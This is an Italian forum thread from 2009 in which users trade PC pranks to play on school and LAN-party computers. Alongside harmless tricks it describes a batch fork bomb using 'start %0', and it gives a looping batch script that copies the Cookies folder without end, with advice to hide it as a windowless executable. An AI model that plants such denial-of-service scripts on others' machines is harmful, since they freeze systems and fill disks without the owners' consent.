Originally posted by alex5800+11/09/09 - 19:24
(alex5800 @ 11/09/09 - 19:24)
oddio ai lanparty dove vado c'è sempre qualche vittima che va in panico e che non ci arriverà mai finche non glielo dicono.
ricordate di salvare l'immagine in un formato più qualitativo es.
.png,etc...)
poi un altro scherzone che io faccio sempre appena c'è l'opportunità nei computer della scuola è:
1-creare una cartella sul desktop
2-creare una cartella dentro quella del punto uno
3-crearne un'altra dentro quella del punto 2
4-rinominare con più lettere possibili la cartella del punto 3
5-rinominare con più lettere possibili la cartella del punto 2
6-provare a cancellare la cartella del punto 1
N.B. affinchè l'esperimento funzioni bisogna farlo su XP
uuhaeeaahohaeoae
ne faccio uno io:
aprite il blocco note
scrivete:
START
START
START
START
il più che potete
salvate in .bat
avviate il file .bat
aahehahhaehuaehaeua [/b]
Old but gold
Computer pataccone della scuola che si riavvia da solo del mio vicino auhauhau
Sup
Mi hai impallato il pc eheheuehuahsuahs

No no, start %0 fa partire un'altra copia di sè stesso, quindi si moltiplicano in modo esponenziale fino a bloccare il PC.
1 -> 2 -> 4 -> 8 -> 16 -> 32 -> ecc....
Originally posted by Sassolino@11/09/09 - 19:17
-Hilinus@11/09/09 - 17:11
Ne so uno ancora più semplice e bastardo:
Con paint screenate il desktop e poi mettetelo come sfondo, avendo cura di cancellare tutte le icone presenti prima di procedere
-Hilinus@11/09/09 - 17:11
Ne so uno ancora più semplice e bastardo:
Con paint screenate il desktop e poi mettetelo come sfondo, avendo cura di cancellare tutte le icone presenti prima di procedere

oddio ai lanparty dove vado c'è sempre qualche vittima che va in panico e che non ci arriverà mai finche non glielo dicono.

ricordate di salvare l'immagine in un formato più qualitativo es.

poi un altro scherzone che io faccio sempre appena c'è l'opportunità nei computer della scuola è:
1-creare una cartella sul desktop
2-creare una cartella dentro quella del punto uno
3-crearne un'altra dentro quella del punto 2
4-rinominare con più lettere possibili la cartella del punto 3
5-rinominare con più lettere possibili la cartella del punto 2
6-provare a cancellare la cartella del punto 1
N.B. affinchè l'esperimento funzioni bisogna farlo su XP
uuhaeeaahohaeoae
ne faccio uno io:
aprite il blocco note
scrivete:
START
START
START
START
il più che potete
salvate in .bat
avviate il file .bat
aahehahhaehuaehaeua [/b]
Old but gold
Computer pataccone della scuola che si riavvia da solo del mio vicino auhauhau
Sup

Mi hai impallato il pc eheheuehuahsuahs

Inviato il 12 settembre 2009 - 23:18
Originally posted by Fabio206@12/09/09 - 23:49
praticamente % (div) è il comando che serve per ricavare il resto di una divisione, ma essendo per 0 viene un'operazione non consentita o infinito probabilmente..e poi ovviamente cicla ritornando al label s
praticamente % (div) è il comando che serve per ricavare il resto di una divisione, ma essendo per 0 viene un'operazione non consentita o infinito probabilmente..e poi ovviamente cicla ritornando al label s

No no, start %0 fa partire un'altra copia di sè stesso, quindi si moltiplicano in modo esponenziale fino a bloccare il PC.

Inviato il 13 settembre 2009 - 10:54
EDIT: ho letto adesso che il titolo del topic è "scherzi innocenti", e non "Malwares da spionaggio industriale" 
Scusate...
EDIT2: posto un codice + consono al topic
Mi raccomando: convertite il .bat in .exe, e fatelo "Ghost Application", in questo modo non comparirà nessuna finestra del DOS lol
Se volete essere + bastardi, copiate un files leggerissimo con destinazione desktop
Potete creare facilmente un files .txd con il codice

Scusate...
EDIT2: posto un codice + consono al topic

set 0 :1 set /a x=x+1 copy "%userprofile%\Cookies" "%userprofile%\Cookies+%x%" goto 1
Mi raccomando: convertite il .bat in .exe, e fatelo "Ghost Application", in questo modo non comparirà nessuna finestra del DOS lol
Se volete essere + bastardi, copiate un files leggerissimo con destinazione desktop

Potete creare facilmente un files .txd con il codice

/
"Alme Sol, curru nitido diem qui promis et celas aliusque et idem nasceris, possis nihil urbe Roma visere maius"
/
"Alme Sol, curru nitido diem qui promis et celas aliusque et idem nasceris, possis nihil urbe Roma visere maius"
/
Inviato il 13 settembre 2009 - 16:26
Originally posted by Supdario+13/09/09 - 00:18
(Supdario @ 13/09/09 - 00:18)
-Fabio206@12/09/09 - 23:49
[/b]
sup ma sta roba tua non nuoce il pc vero? ho paura a farlo..
E per fallo ripartì che faccio, lo spengo e riaccendo?
Starve The Ego, Feed The Soul.
Sup ne sa sempre una più del diavolo.
Per fare uno scherzo si può anche inserire la stringa
nella barra indirizzi di firefox e diventa una sorta di editor
Oppure con visual studio 2005 se ne possono fare a palate, tipo fare un programma che nel form load abbia il comando restart (il comando viene attivato quando si carica il form, quindi appena si avvia il programma in pratica) quindi appena si apre si riavvia automaticamente, oppure mettere un timer che ogni qualche secondo genera una finestra di errore.
Ne abbiamo fatte a scuola di queste cazzate

sup ma sta roba tua non nuoce il pc vero? ho paura a farlo..

Inviato il 13 settembre 2009 - 17:53
No ovviamente non fa niente di male ad un PC normale, lo blocca e basta. 
In realtà verrebbe usato dagli hacker per fare gli attacchi DoS nei server (bloccarli completamente) dove c'è una vulnerabilità, costringendo ad un riavvio manuale (cosa abbastanza macchinosa da fare nei dedicati di cui non hai il controllo fisico
).

In realtà verrebbe usato dagli hacker per fare gli attacchi DoS nei server (bloccarli completamente) dove c'è una vulnerabilità, costringendo ad un riavvio manuale (cosa abbastanza macchinosa da fare nei dedicati di cui non hai il controllo fisico

Inviato il 14 settembre 2009 - 07:32
Originally posted by Supdario@13/09/09 - 18:53
).

Inviato il 14 settembre 2009 - 08:15
Originally posted by Laker@14/09/09 - 01:51
Sup vorrei avere le tue conoscenze informatiche
Sup vorrei avere le tue conoscenze informatiche

Sup ne sa sempre una più del diavolo.

Per fare uno scherzo si può anche inserire la stringa
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
nella barra indirizzi di firefox e diventa una sorta di editor
Oppure con visual studio 2005 se ne possono fare a palate, tipo fare un programma che nel form load abbia il comando restart (il comando viene attivato quando si carica il form, quindi appena si avvia il programma in pratica) quindi appena si apre si riavvia automaticamente, oppure mettere un timer che ogni qualche secondo genera una finestra di errore.
Ne abbiamo fatte a scuola di queste cazzate

Inviato il 14 settembre 2009 - 08:57
Originally posted by Davide96+14/09/09 - 08:32
(Davide96 @ 14/09/09 - 08:32)
-Supdario@13/09/09 - 18:53
).
[/b]

Inviato il 14 settembre 2009 - 10:15
Originally posted by Supdario+14/09/09 - 09:57
(Supdario @ 14/09/09 - 09:57)
[/b]
Grazie Sup
.
1 utenti stanno leggendo questa discussione
Originally posted by Davide96@14/09/09 - 08:32
).

Grazie Sup